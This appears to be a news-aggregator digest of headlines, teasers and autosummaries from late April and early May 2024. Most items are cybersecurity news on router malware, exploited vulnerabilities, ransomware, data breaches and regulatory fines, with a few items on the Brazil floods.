          Autosummary: The research found that less than half of security teams are reporting on time to respond (49%), time to detect (48%), and time to recover (45%).


          What is cybersecurity mesh architecture (CSMA)?

          ciber
          2024-05-03 https://www.helpnetsecurity.com/2024/05/03/cybersecurity-mesh-architecture-csma/

          Cybersecurity mesh architecture (CSMA) is a set of organizing principles used to create an effective security framework. Using a CSMA approach means designing a security architecture that is composable and scalable with easily extensible interfaces, a common data schema and well-defined interfaces and APIs for interoperability. A well-designed CSMA allows various security controls and solutions to work together more effectively. In turn, this allows security organizations to better handle threat intelligence, incident response, security … More

          Autosummary: The detection mesh web spans various components and layers of an organization’s IT environment, including endpoints and devices, APIs, infrastructure (cloud, on-prem, hybrid), applications and SaaS, networks, data flows and storage, and authentication and authorization systems. Process measurements can be constructed around known metrics (time-to-remediate, etc.) or alternative metrics focused on process (adherence to security playbooks, time spent out of compliance, time-to-triage). In turn, this allows security organizations to better handle threat intelligence, incident response, security asset management, and other core functions of modern cybersecurity.


          Dam bursts and death toll rises in Brazil floods

          latam
          2024-05-03 https://www.bbc.co.uk/news/world-latin-america-68948239
          More than 30 people have been killed and 60 are missing in the southern state of Rio Grande do Sul.


          Orum No Code Verify helps businesses validate bank accounts

          financial
          2024-05-03 https://www.helpnetsecurity.com/2024/05/03/orum-no-code-verify/

          Orum launched No Code Verify, which helps businesses and institutions determine whether a bank account is open and valid before initiating payments — all without integrating an API. Orum’s Verify solution offers 100% coverage of all US-based consumer and business bank accounts — a meaningful step forward in an industry still plagued by invalid credentials, friction, and fraud. The new technology, launched in October 2023, makes it easy for businesses and banks to verify the … More

          Autosummary: Orum’s No Code Verify validates account status instantly, determining whether a bank account is open, valid, and able to receive payments – fulfilling Nacha requirements.


          Bug hunters can get up to $450,000 for an RCE in Google’s Android apps

          exploits
          2024-05-03 https://www.helpnetsecurity.com/2024/05/03/google-android-apps-vulnerabilities/

          Google has drastically increased the rewards bug hunters can get for reporting vulnerabilities in Android apps it develops and maintains. “We increased reward amounts by up to 10x in some categories (for example Remote Arbitrary Code Execution in a Tier 1 app went from $30,000 to $300,000),” Google information security engineer Kristoffer Blasiak has pointed out. Google is also ready to pay more for high-quality reports, so that the Mobile Vulnerability Reward Program team can … More

          Autosummary: The apps are categorized in three tiers: Tier 1 includes Google Play Services, Android Google Search App (AGSA), Google Cloud, and Gmail; Tier 2 includes apps that interact with either a Tier 1 application, user data, or Google’s services; Tier 3 includes apps that don’t handle user data or interact with Google’s services. After these latest changes, a bug in a Tier 1 app that can lead to arbitrary code execution and can be triggered remotely and without user interaction can get its discoverer $300,000.


          BlackBerry CylanceMDR improves cybersecurity defensive strategy

          ciber
          2024-05-03 https://www.helpnetsecurity.com/2024/05/03/blackberry-cylancemdr/

          BlackBerry introduced the new and expanded CylanceMDR, offering comprehensive Managed Detection & Response (MDR) protection powered by the Cylance AI platform and augmented with award-winning security operations center analysts for 24×7 threat coverage. CylanceMDR (formerly CylanceGUARD) now offers three new packages – Standard, Advanced, and On-Demand. Each package is designed to address the unique cybersecurity challenges businesses face today, from AI detection to expert support, providing a comprehensive solution for all. “CylanceMDR offers more than … More

          Autosummary: CylanceMDR includes hands-on onboarding, alert triage, investigation, managed threat hunting, digital forensics, comprehensive incident response, and critical event management.


          Expert-Led Webinar - Uncovering Latest DDoS Tactics and Learn How to Fight Back

          industry
          2024-05-03 https://thehackernews.com/2024/05/expert-led-webinar-learn-latest-ddos.html
          In today's rapidly evolving digital landscape, the threat of Distributed Denial of Service (DDoS) attacks looms more significant than ever. As these cyber threats grow in sophistication, understanding and countering them becomes crucial for any business seeking to protect its online presence. To address this urgent need, we are thrilled to announce our upcoming webinar, "Uncovering Contemporary

          Autosummary: What You Will Learn: Understanding the Threat: Explore the escalated risks DDoS attacks pose to your business, including recent advancements in attack strategies like IoT botnets and amplification tactics.


          Hackers Increasingly Abusing Microsoft Graph API for Stealthy Malware Communications

          exploits
          2024-05-03 https://thehackernews.com/2024/05/hackers-increasingly-abusing-microsoft.html
          Threat actors have been increasingly weaponizing Microsoft Graph API for malicious purposes with the aim of evading detection. This is done to "facilitate communications with command-and-control (C&C) infrastructure hosted on Microsoft cloud services," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News.

          Autosummary: "Most times, attackers leverage trusted relationships to execute commands in connected compute instances (VMs) or hybrid environments by compromising third-party external vendors or contractors who have privileged access to manage internal cloud-based environments," the cloud security firm said.


          ZLoader Malware adds Zeus’s anti-analysis feature

          exploits
          2024-05-03 https://securityaffairs.com/162688/cyber-crime/zloader-malware-anti-analysis-feature.html
          Zloader continues to evolve; its authors added an anti-analysis feature that was originally present in the Zeus banking trojan. Zloader (aka Terdot, DELoader, or Silent Night) is a modular trojan based on the leaked ZeuS source code. After a hiatus of almost two years, Zloader reappeared with new obfuscation techniques, domain generation algorithm (DGA), and […]

          Autosummary: ZLoader Malware adds Zeus’s anti-analysis feature (Pierluigi Paganini, May 03, 2024). Zloader continues to evolve; its authors added an anti-analysis feature that was originally present in the Zeus banking trojan.


          NATO and EU condemn Russia"s cyberattacks against Germany, Czechia

          ciber
          2024-05-03 https://www.bleepingcomputer.com/news/security/nato-and-eu-condemn-russias-cyberattacks-against-germany-czechia/
          NATO and the European Union, with international partners, formally condemned a long-term cyber espionage campaign against European countries conducted by the Russian threat group APT28. [...]

          Autosummary: According to NATO, these recent incidents include "sabotage, acts of violence, cyber and electronic interference, disinformation campaigns, and other hybrid operations" impacting Czechia, Estonia, Germany, Latvia, Lithuania, Poland, and the United Kingdom.


          Android bug can leak DNS traffic with VPN kill switch enabled

          exploits
          2024-05-03 https://www.bleepingcomputer.com/news/security/android-bug-can-leak-dns-traffic-with-vpn-kill-switch-enabled/
          A Mullvad VPN user has discovered that Android devices leak DNS queries when switching VPN servers even though the "Always-on VPN" feature was enabled with the "Block connections without VPN" option. [...]

          Autosummary: In October 2022, Mullvad also found that Android devices were leaking DNS queries (e.g., IP addresses, DNS lookups, and HTTPS traffic) every time they connected to a WiFi network because of connectivity checks even if "Always-on VPN" was toggled on with "Block connections without VPN" enabled.


          NSA warns of North Korean hackers exploiting weak DMARC email policies

          exploits
          2024-05-03 https://www.bleepingcomputer.com/news/security/nsa-warns-of-north-korean-hackers-exploiting-weak-dmarc-email-policies/
          The NSA and FBI warned that the APT43 North Korea-linked hacking group exploits weak email Domain-based Message Authentication Reporting and Conformance (DMARC) policies to mask spearphishing attacks. [...]


          LockBit published data stolen from Simone Veil hospital in Cannes

          ransomware
          2024-05-03 https://securityaffairs.com/162721/cyber-crime/lockbit-published-simone-veil-hospital-data.html
          LockBit ransomware operators have published sensitive data allegedly stolen from the Simone Veil hospital in Cannes. In April, a cyber attack hit the Hospital Simone Veil in Cannes (CHC-SV), impacting medical procedures and forcing personnel to return to pen and paper. Non-urgent surgical procedures and consultations scheduled at the time of the attack were postponed. The French […]

          Autosummary: LockBit published data stolen from Simone Veil hospital in Cannes (Pierluigi Paganini, May 03, 2024). LockBit ransomware operators have published sensitive data allegedly stolen from the Simone Veil hospital in Cannes.


          Watch: Bridge buckles and plunges into Brazil river

          latam
          2024-05-03 https://www.bbc.co.uk/news/world-latin-america-68955655
          Footage shows a man narrowly avoiding falling into the water as a bridge gives way.


          Android bug leaks DNS queries even when VPN kill switch is enabled

          exploits
          2024-05-03 https://www.bleepingcomputer.com/news/security/android-bug-leaks-dns-queries-even-when-vpn-kill-switch-is-enabled/
          A Mullvad VPN user has discovered that Android devices leak DNS queries when switching VPN servers even though the "Always-on VPN" feature was enabled with the "Block connections without VPN" option. [...]

          Autosummary: In October 2022, Mullvad also found that Android devices were leaking DNS queries (e.g., IP addresses, DNS lookups, and HTTPS traffic) every time they connected to a WiFi network because of connectivity checks even if "Always-on VPN" was toggled on with "Block connections without VPN" enabled.


          2024 Data Breach Investigations Report: Most breaches involve a non-malicious human element

          financial
          2024-05-02 https://www.helpnetsecurity.com/2024/05/02/verizon-2024-data-breach-investigations-report-dbir/

          The exploitation of vulnerabilities as an initial point of entry almost tripled from the previous year, accounting for 14% of all breaches, according to Verizon’s 2024 Data Breach Investigations Report, which analyzed a record-high 30,458 security incidents and 10,626 confirmed breaches in 2023. This spike was driven primarily by the increasing frequency of attacks targeting vulnerabilities on unpatched systems and devices (zero-day vulnerabilities) by ransomware actors. The MOVEit software breach was one of the largest … More

          Autosummary: Other key findings from this year’s report include: 32% of all breaches involved some type of extortion technique, including ransomware; over the past two years, roughly a quarter (between 24% and 25%) of financially motivated incidents involved pretexting; over the past 10 years, the use of stolen credentials has appeared in almost one-third (31%) of all breaches; half of the breaches in EMEA are internal; espionage attacks continue to dominate in the APAC region. “The Verizon 2024 Data Breach Investigations Report shows it’s still the basic security errors putting organizations at risk, such as long windows between discovering and patching vulnerabilities, and employees being inadequately trained to identify scams.


          Women rising in cybersecurity roles, but roadblocks remain

          ciber
          2024-05-02 https://www.helpnetsecurity.com/2024/05/02/women-in-cybersecurity-isc2/

          The ISC2 study on women in cybersecurity, a comprehensive research effort that collected responses from 2,400 women, has revealed several significant findings. These include promising trends in women’s entry into the profession, their roles within teams, and their comparable achievements with men. However, the study also underscores the need for continued efforts to support and promote women in the cybersecurity workforce. Increased diversity: with the average representation of women on cybersecurity teams at 23%, attracting … More

          Autosummary: Women want to work in a constantly evolving field (21%) and one where they can help people and society (16%) at higher rates than men (18% and 14%, respectively).


          AI-driven phishing attacks deceive even the most aware users

          financial
          2024-05-02 https://www.helpnetsecurity.com/2024/05/02/genai-phishing-attacks-rise/

          Vishing and deepfake phishing attacks are on the rise as attackers leverage GenAI to amplify social engineering tactics, according to Zscaler. AI automates and personalizes various aspects of the attack process: AI-driven phishing attacks leverage AI tools to enhance the sophistication and effectiveness of phishing campaigns. AI automates and personalizes various aspects of the attack process, making phishing even more challenging to detect. For example, chatbots are commonly used to craft highly convincing, error-free phishing … More

          Autosummary: For this report, Zscaler ThreatLabz analyzed 2 billion blocked phishing transactions between January–December 2023, exploring various aspects including the top phishing attacks, targeted countries, hosting countries for phishing content, distribution of company types based on server IP addresses, and the top referrers linked to these phishing attacks.


          New Cuttlefish Malware Hijacks Router Connections, Sniffs for Cloud Credentials

          exploits
          2024-05-02 https://thehackernews.com/2024/05/new-cuttlefish-malware-hijacks-router.html
          A new malware called Cuttlefish is targeting small office and home office (SOHO) routers with the goal of stealthily monitoring all traffic through the devices and gathering authentication data from HTTP GET and POST requests. "This malware is modular, designed primarily to steal authentication material found in web requests that transit the router from the adjacent

          Autosummary: However, a successful foothold is followed by the deployment of a bash script that gathers host data, such as the contents of /etc, running processes, active connections, and mounts, and exfiltrates the details to an actor-controlled domain ("kkthreas[.]com/upload").


          When is One Vulnerability Scanner Not Enough?

          exploits
          2024-05-02 https://thehackernews.com/2024/05/when-is-one-vulnerability-scanner-not.html
          Like antivirus software, vulnerability scans rely on a database of known weaknesses. That’s why websites like VirusTotal exist, to give cyber practitioners a chance to see whether a malware sample is detected by multiple virus scanning engines, but this concept hasn’t existed in the vulnerability management space. The benefits of using multiple scanning engines: generally speaking

          Autosummary: Know what's exposed: get complete visibility of your network perimeter, track active and unresponsive targets, identify changes, monitor expiring certificates, and see any ports, services or protocols that shouldn't be exposed to the internet.


          CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability

          exploits
          2024-05-02 https://thehackernews.com/2024/05/cisa-warns-of-active-exploitation-of.html
          The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical flaw impacting GitLab to its Known Exploited Vulnerabilities (KEV) catalog, owing to active exploitation in the wild. Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email


          Panda Restaurant Group disclosed a data breach

          financial
          2024-05-02 https://securityaffairs.com/162633/data-breach/panda-restaurant-group-data-breach.html
          Panda Restaurant Group disclosed a data breach that occurred in March, resulting in the theft of associates’ personal information. Panda Restaurant Group disclosed a data breach that occurred in March, resulting in the theft of personal information belonging to its associates. Panda Restaurant Group, Inc. is the parent company of Panda Inn, Panda Express and […]

          Autosummary: Panda Restaurant Group disclosed a data breach (Pierluigi Paganini, May 02, 2024). Panda Restaurant Group disclosed a data breach that occurred in March, resulting in the theft of associates’ personal information.


          REvil hacker behind Kaseya ransomware attack gets 13 years in prison

          exploits ransomware
          2024-05-02 https://www.bleepingcomputer.com/news/security/revil-hacker-behind-kaseya-ransomware-attack-gets-13-years-in-prison/
          Yaroslav Vasinskyi, a Ukrainian national, was sentenced to 13 years and seven months in prison and ordered to pay $16 million in restitution for his involvement in the REvil ransomware operation. [...]

          Autosummary: REvil was one of the most successful ransomware operations in recent history, reaching its peak in 2021 with the Kaseya MSP supply-chain attack, a $50 million ransom demand from computer maker Acer, and blueprint leaks of unreleased upcoming Apple devices.


          Cybersecurity consultant arrested after allegedly extorting IT firm

          ciber
          2024-05-02 https://www.bleepingcomputer.com/news/legal/cybersecurity-consultant-arrested-after-allegedly-extorting-it-firm/
          A former cybersecurity consultant was arrested for allegedly attempting to extort a publicly traded IT company by threatening to disclose confidential and proprietary data unless they paid him $1,500,000. [...]


          New SOHO router malware aims for cloud accounts, internal company resources

          exploits
          2024-05-02 https://www.helpnetsecurity.com/2024/05/02/cuttlefish-soho-routers/

          Cuttlefish, a new malware family that targets enterprise-grade small office/home office (SOHO) routers, is used by criminals to steal account credentials / secrets for AWS, CloudFlare, Docker, BitBucket, Alibaba Cloud and other cloud-based services. “With the stolen key material, the actor not only retrieves cloud resources associated with the targeted entity but gains a foothold into that cloud ecosystem,” Black Lotus Labs researchers noted. “To exfiltrate data, the threat actor first creates either a …

          Autosummary: “Internet routers remain a popular asset for threat actors to compromise since they often have reduced security monitoring, have less stringent password policies, are not updated frequently, and may use powerful operating systems that allow for installation of malware such as cryptocurrency miners, proxies, distributed denial of service (DDoS) malware, malicious scripts, and webservers,” Trend Micro researchers recently pointed out.


          Trend Micro expands AI-powered cybersecurity platform

          ciber
          2024-05-02 https://www.helpnetsecurity.com/2024/05/02/trend-micro-platform-ai-powered-functionality/

          Trend Micro launched significant additional AI-powered functionality in its platform to secure organizational use of AI and better manage the risks associated with mass adoption of new AI tools. “Great advancements in technology always come with new cyber risk. Like cloud and every other leap in technology we have secured, the promise of the AI era is only powerful if protected. Our latest platform updates deliver new efficiencies to security teams and provide critical guidelines …


          CISA adds GitLab flaw to its Known Exploited Vulnerabilities catalog

          exploits
          2024-05-02 https://securityaffairs.com/162646/security/gitlab-known-exploited-vulnerabilities-catalog.html
          CISA adds GitLab Community and Enterprise Editions improper access control vulnerability to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a GitLab Community and Enterprise Editions improper access control vulnerability to its Known Exploited Vulnerabilities (KEV) catalog. The issue, tracked as CVE-2023-7028 (CVSS score: 10.0), is an account takeover via Password Reset. The […]

          Autosummary: The flaw impacts the following versions: 16.1 prior to 16.1.5, 16.2 prior to 16.2.8, 16.3 prior to 16.3.6, 16.4 prior to 16.4.4, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2. GitLab addressed the flaw with the releases 16.7.2, 16.5.6, and 16.6.4.


          Watch out for tech support scams lurking in sponsored search results

          financial
          2024-05-02 https://www.malwarebytes.com/blog/news/2024/05/watch-out-for-tech-support-scams-lurking-in-sponsored-search-results
          Our researchers found fake sponsored search results that lead consumers to a typical fake Microsoft alert site set up by tech support scammers.


          Adding insult to injury: crypto recovery scams

          financial
          2024-05-02 https://www.welivesecurity.com/en/scams/crypto-recovery-scams-insult-injury/
          Once your crypto has been stolen, it is extremely difficult to get back – be wary of fake promises to retrieve your funds and learn how to avoid becoming a victim twice over.

          Autosummary: Consider the following red flags: they ask for an upfront fee before commencing their ‘work’, or another charge (i.e., tax) before you can proceed with processing refunds; they may communicate with a web-based email (e.g., Gmail/Yahoo) rather than a corporate account; they ask for your banking, crypto account and/or personal information in order to ‘return’ your funds; they claim to work closely with law enforcement or government officials; they get in touch out of the blue – either via social media DMs, text or email; they don’t offer any telephone number via which to get in touch. Consider the following steps if you have recently lost cryptocurrency due to fraud or theft: collect as much evidence as possible; report the incident to the police and/or relevant regulatory body; reach out to a legitimate law firm that offers recovery services – being sure to research their business fully first; consider contacting the exchange where the scammer cashed out your crypto (if known). Avoiding crypto theft: granted, the best way to avoid crypto recovery scams is not to have your digital currency stolen in the first place.


          How the computer games industry is embracing AI

          industry
          2024-05-02 https://www.bbc.co.uk/news/business-68844761
          Developing computer games can be wildly expensive so some hope that AI can cut the cost.


          Making cybersecurity more appealing to women, closing the skills gap

          ciber
          2024-05-01 https://www.helpnetsecurity.com/2024/05/01/charly-davis-aspphire-cybersecurity-women/

          In this Help Net Security interview, Charly Davis, CCO at Sapphire, provides insights into the current challenges and barriers women face in the cybersecurity industry. Davis emphasizes the need for proactive strategies to attract diverse talent, improve mentorship opportunities, and foster supportive organizational cultures in cybersecurity. Could you explain the current skills gap in cybersecurity and what makes it a critical issue for both private and public sectors? The widening cyber skills gap has been …

          Autosummary: To achieve balance, a team with diverse backgrounds, religions, genders, skill sets, life experiences, and ages is needed. There are some strong examples out there, like Women in Cybersecurity, but I think women can be reluctant to join them because they don’t want to be different to their male counterparts and want to be part of an inclusive operating structure such as Tech Channel Ambassadors, recently established to address this significant gap in the sector. Personal mentorship can drive really positive change, and it’s certainly had a strong influence on my career. On some days, you may need to deal with nation-state actors with different geopolitical profiles, while on other days, you may encounter some young hacktivists. In this Help Net Security interview, Charly Davis, CCO at Sapphire, provides insights into the current challenges and barriers women face in the cybersecurity industry. One big contributor is rising demand – cyber threats are now very prominent on the business agenda, and we have multiple regulations like the GDPR, DORA, and NIS2 with a mandate for better security.


          Cybersecurity jobs available right now: May 1, 2024

          ciber
          2024-05-01 https://www.helpnetsecurity.com/2024/05/01/cybersecurity-jobs-available-right-now-may-1-2024/

          Adversary Simulation Specialist, LyondellBasell | Poland | On-site. The Adversary Simulation Specialist will be responsible for testing and evaluating the security of LyondellBasell’s networks, systems, and applications. This role involves conducting application assessments, vulnerability assessments, penetration testing, and ethical hacking to identify and exploit vulnerabilities to improve the organization’s security posture. Cloud Cyber Defense Engineer, Deloitte | United Kingdom | Hybrid. As a Cloud Cyber Defense …

          Autosummary: Cyber Security Analyst, Salt Security | Israel | On-site. As a Cyber Security Analyst, you will monitor and analyze security events and alerts, perform triage of incoming alerts – assess the priority, determine risk, and respond – and create tickets and escalate them to higher-level security analysts and developers. Threat Operations Security Engineer, Thought Machine | United Kingdom | Hybrid. As Threat Operations Security Engineer, you will develop, integrate, and operate highly available log collection, event monitoring, alert generation, and incident management tooling and services for security using Elasticsearch on Kubernetes.


          Wireless carriers fined $200 million after illegally sharing customer location data

          Telcos
          2024-05-01 https://www.malwarebytes.com/blog/news/2024/05/wireless-carriers-fined-200-million-after-illegally-sharing-customer-location-data
          Four major wireless carriers have been fined by the FCC for sharing access to customers’ location data without consent.

          Autosummary: The FCC fined AT&T, Sprint, T-Mobile, and Verizon a total of almost $200 million for “illegally sharing access to customers’ location information without consent and without taking reasonable measures to protect that information against unauthorized disclosure.”


          New Cuttlefish malware infects routers to monitor traffic for credentials

          exploits
          2024-05-01 https://www.bleepingcomputer.com/news/security/new-cuttlefish-malware-infects-routers-to-monitor-traffic-for-credentials/
          A new malware named "Cuttlefish" has been spotted infecting enterprise-grade and small office/home office (SOHO) routers to monitor data that passes through them and steal authentication information. [...]

          Autosummary: The malware passively sniffs packets searching for "credential markers" within the traffic, such as usernames, passwords, and tokens especially associated with public cloud-based services like Alicloud, AWS, Digital Ocean, CloudFlare, and BitBucket.


          Android Malware Wpeeper Uses Compromised WordPress Sites to Hide C2 Servers

          exploits
          2024-05-01 https://thehackernews.com/2024/05/android-malware-wpeeper-uses.html
          Cybersecurity researchers have discovered a previously undocumented malware targeting Android devices that uses compromised WordPress sites as relays for its actual command-and-control (C2) servers for detection evasion. The malware, codenamed Wpeeper, is an ELF binary that leverages the HTTPS protocol to secure its C2 communications. "Wpeeper is a typical backdoor Trojan for Android

          Autosummary: "Wpeeper is a typical backdoor Trojan for Android systems, supporting functions such as collecting sensitive device information, managing files and directories, uploading and downloading, and executing commands," researchers from the QiAnXin XLab team said.


          Everyone’s an Expert: How to Empower Your Employees for Cybersecurity Success

          ciber
          2024-05-01 https://thehackernews.com/2024/05/everyones-expert-how-to-empower-your.html
          There’s a natural human desire to avoid threatening scenarios. The irony, of course, is if you hope to attain any semblance of security, you’ve got to remain prepared to confront those very same threats. As a decision-maker for your organization, you know this well. But no matter how many experts or trusted cybersecurity tools your organization has a standing guard,

          Autosummary: Huntress Security Awareness Training is an easy, effective, and enjoyable solution that helps: minimize time-consuming maintenance and management tasks; improve knowledge retention through neuroscience-based learning principles; update you and your employees on the current threat landscape; establish a culture that values cybersecurity; inspire meaningful behavioral habits to improve security awareness; engage you and your employees in a creative, impactful manner; assure regulatory compliance; keep cyber criminals out of your organization. Discover how a fully managed SAT can free up your time and resources, all while empowering your employees with smarter habits that better protect your organization from cyber threats. Your SAT should feature engaging videos, text, and short quizzes that showcase realistic cyber threats you and your employees are likely to encounter in the wild, such as phishing, social engineering, physical device security and more, plus measurable data … with easy-to-read reports on usage and success rates. These simulations should also be dispersed at unpredictable time intervals (i.e. morning, night, weekends, early in the month, later in the month, etc.), keeping learners on their toes and allowing them to put their security knowledge into practice. Remember, if the episodes are intentionally entertaining and whimsical, you’re more likely to find your employees conversing about inside jokes, recurring characters, and, of course, what they’ve learned. At their core, SAT programs are designed to help you: educate your employees on recognizing cybersecurity risks such as phishing and ransomware; minimize your organization’s exposure to cyber threats; maintain regulatory compliance with cyber insurance stipulations. These are all worthwhile goals in helping your organization thrive amidst ever-evolving cyber threats. For your own administrative needs, select a SAT that can sync regularly with your most popular platforms, such as Microsoft 365, Google, Okta, or Slack.


          ZLoader Malware Evolves with Anti-Analysis Trick from Zeus Banking Trojan

          financial exploits
          2024-05-01 https://thehackernews.com/2024/05/zloader-malware-evolves-with-anti.html
          The authors behind the resurfaced ZLoader malware have added a feature that was originally present in the Zeus banking trojan that it’s based on, indicating that it’s being actively developed. "The latest version, 2.4.1.0, introduces a feature to prevent execution on machines that differ from the original infection," Zscaler ThreatLabz researcher Santiago

          Autosummary: Over the past two months, email-based phishing campaigns have also been observed targeting organizations in the U.S., Turkey, Mauritius, Israel, Russia, and Croatia with Taskun malware, which acts as a facilitator for Agent Tesla, per findings from Veriti.


          Residents stranded on rooftops after deadly Brazil floods

          latam
          2024-05-01 https://www.bbc.co.uk/news/world-latin-america-68935249
          Survivors are being winched up by helicopters from the flooded areas in the south of Brazil.


          Panda Restaurants discloses data breach after corporate systems hack

          financial
          2024-05-01 https://www.bleepingcomputer.com/news/security/panda-restaurants-discloses-a-data-breach-after-corporate-systems-hack/
          Panda Restaurant Group, the parent company of Panda Express, Panda Inn, and Hibachi-San, disclosed a data breach after attackers compromised its corporate systems in March and stole the personal information of an undisclosed number of individuals. [...]


          French hospital CHC-SV refuses to pay LockBit extortion demand

          ransomware
          2024-05-01 https://www.bleepingcomputer.com/news/security/french-hospital-chc-sv-refuses-to-pay-lockbit-extortion-demand/
          The Hôpital de Cannes - Simone Veil (CHC-SV) in France announced it received a ransom demand from the Lockbit 3.0 ransomware gang, saying they refuse to pay the ransom. [...]


          CISA says GitLab account takeover bug is actively exploited in attacks

          exploits
          2024-05-01 https://www.bleepingcomputer.com/news/security/cisa-says-gitlab-account-takeover-bug-is-actively-exploited-in-attacks/
          CISA warned today that attackers are actively exploiting a maximum-severity GitLab vulnerability that allows them to take over accounts via password resets. [...]


          Bitcoin Forensic Analysis Uncovers Money Laundering Clusters and Criminal Proceeds

          financial
          2024-05-01 https://thehackernews.com/2024/05/bitcoin-forensic-analysis-uncovers.html
          A forensic analysis of a graph dataset containing transactions on the Bitcoin blockchain has revealed clusters associated with illicit activity and money laundering, including detecting criminal proceeds sent to a crypto exchange and previously unknown wallets belonging to a Russian darknet market. The findings come from Elliptic in collaboration with researchers from the

          Autosummary: The idea, in a nutshell, is to uncover illicit activity and money laundering patterns by taking advantage of blockchain’s pseudonymity and combining it with knowledge about the presence of licit (e.g., exchange, wallet provider, miner, etc.) and illicit services (e.g., darknet market, malware, terrorist organizations, Ponzi scheme, etc.) on the network.


          Cuttlefish malware targets enterprise-grade SOHO routers

          exploits
          2024-05-01 https://securityaffairs.com/162603/malware/cuttlefish-malware-targets-routers.html
          A new malware named Cuttlefish targets enterprise-grade and small office/home office (SOHO) routers to harvest public cloud authentication data. Researchers at Lumen’s Black Lotus Labs discovered a new malware family, named Cuttlefish, which targets enterprise-grade and small office/home office (SOHO) routers to harvest public cloud authentication data from internet traffic. The malware creates a proxy […]

          Autosummary: Pierluigi Paganini, May 01, 2024. A new malware named Cuttlefish targets enterprise-grade and small office/home office (SOHO) routers to harvest public cloud authentication data. Researchers at Lumen’s Black Lotus Labs discovered a new malware family, named Cuttlefish, which targets enterprise-grade and small office/home office (SOHO) routers to harvest public cloud authentication data from internet traffic.


          US govt warns of pro-Russian hacktivists targeting water facilities

          rusia-ucrania
          2024-05-01 https://www.bleepingcomputer.com/news/security/us-govt-warns-of-pro-russian-hacktivists-targeting-water-facilities/
          The US government is warning that pro-Russian hacktivists are seeking out and hacking into unsecured operational technology (OT) systems used to disrupt critical infrastructure operations. [...]

          Autosummary: The joint advisory comes from six US govt agencies, including CISA, FBI, NSA, EPA, DOE, USDA, and FDA, as well as the Multi-State Information Sharing and Analysis Center (MS-ISAC), Canada’s Centre for Cyber Security (CCCS), and United Kingdom’s National Cyber Security Centre (NCSC-UK).


          eBook: Do you have what it takes to lead in cybersecurity?

          ciber
          2024-04-30 https://www.helpnetsecurity.com/2024/04/30/ebook-lead-in-cybersecurity/

          Organizations worldwide need talented, experienced, and knowledgeable cybersecurity teams who understand the advantages and risks of emerging technologies. Aspiring leaders in the cybersecurity field need more than just job experience. They need a diverse and robust set of skills that can only be acquired through a combination of experience, learning, and dedication. Inside the eBook: Cybersecurity Needs More Skilled Professionals; Technical and Non-Technical Skills for Leadership; What Cybersecurity Leaders Have in Common; How Certification Positions …


          Triangulation fraud: The costly scam hitting online retailers

          financial
          2024-04-30 https://www.helpnetsecurity.com/2024/04/30/mike-lemberger-visa-triangulation-fraud-schemes/

          In this Help Net Security interview, Mike Lemberger, Visa’s SVP, Chief Risk Officer, North America, discusses the severe financial losses resulting from triangulation fraud, estimating monthly losses to range from $660 million to $1 billion among merchants. He also highlights the emerging threat of AI-powered voice scams, urging businesses to implement MFA, behavioral biometrics, and employee education to mitigate vulnerabilities and foster collaboration among businesses, technology providers, and regulatory bodies. Could you shed light on …


          Why the automotive sector is a target for email-based cyber attacks

          industry
          2024-04-30 https://www.helpnetsecurity.com/2024/04/30/automotive-email-compromise-attacks-video/

          While every organization across every vertical is at risk of advanced email attacks, certain industries periodically become the go-to target for threat actors. In this Help Net Security video, Mick Leach, Field CISO at Abnormal Security, discusses why the automotive industry is the new most popular target for business email compromise and vendor email compromise attacks. The automotive industry is currently being targeted by cybercriminals who are launching business email compromise (BEC) and vendor email …


          The FCC imposes $200 million in fines on four US carriers for unlawfully sharing user location data

          Telcos
          2024-04-30 https://securityaffairs.com/162540/laws-and-regulations/fcc-fined-4-us-wireless-carriers.html
          The Federal Communications Commission (FCC) fined the largest U.S. wireless carriers $200 million for sharing customers’ real-time location data without consent. The FCC has fined four major U.S. wireless carriers nearly $200 million for unlawfully selling access to real-time location data of their customers without consent. The fines come as a result of the Notices of Apparent Liability […]

          Autosummary: Pierluigi Paganini, April 30, 2024. The Federal Communications Commission (FCC) fined the largest U.S. wireless carriers $200 million for sharing customers’ real-time location data without consent.


          Malwarebytes Premium Security earns “Product of the Year” from AVLab

          exploits
          2024-04-30 https://www.malwarebytes.com/blog/news/2024/04/malwarebytes-premium-earns-product-of-the-year-from-avlab
          Malwarebytes Premium earned "Product of the Year" from AVLab for repeatedly blocking 100% of malware samples used in third-party testing.

          Autosummary: To ensure that the organization’s evaluations reflect current cyberthreats, each round of testing follows three steps: Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.


          FCC fines major wireless carriers over illegal location data sharing

          Telcos
          2024-04-30 https://www.helpnetsecurity.com/2024/04/30/fcc-wireless-carriers-fines/

          The Federal Communications Commission (FCC) fined the nation’s largest wireless carriers for illegally sharing access to customers’ location information without consent and without taking reasonable measures to protect that information against unauthorized disclosure. Wireless carriers shared access to customers’ location data: Sprint and T-Mobile – which have merged since the investigation began – face fines of more than $12 million and $80 million, respectively. AT&T is fined more than $57 million, and Verizon is fined …

          Autosummary: Wireless carriers continued to sell access to location data: the investigations that led to these fines started following public reports that customers’ location information was being disclosed by the largest American wireless carriers without customer consent or other legal authorization to a Missouri Sheriff through a “location-finding service” operated by Securus, a provider of communications services to correctional facilities, to track the location of numerous individuals.


          Palo Alto firewalls: CVE-2024-3400 exploitation and PoCs for persistence after resets/upgrades

          exploits
          2024-04-30 https://www.helpnetsecurity.com/2024/04/30/palo-alto-firewalls-persistence-cve-2024-3400-exploitation/

          There are proof-of-concept techniques allowing attackers to achieve persistence on Palo Alto Networks firewalls after CVE-2024-3400 has been exploited, the company has confirmed on Monday, but they are “not aware at this time of any malicious attempts to use these persistence techniques in active exploitation of the vulnerability.” “These techniques work on a device that is already compromised with interactive root level command execution,” they added. The evolving situation: On April 12, Palo Alto Networks …


          U.S. Government Releases New AI Security Guidelines for Critical Infrastructure

          government
          2024-04-30 https://thehackernews.com/2024/04/us-government-releases-new-ai-security.html
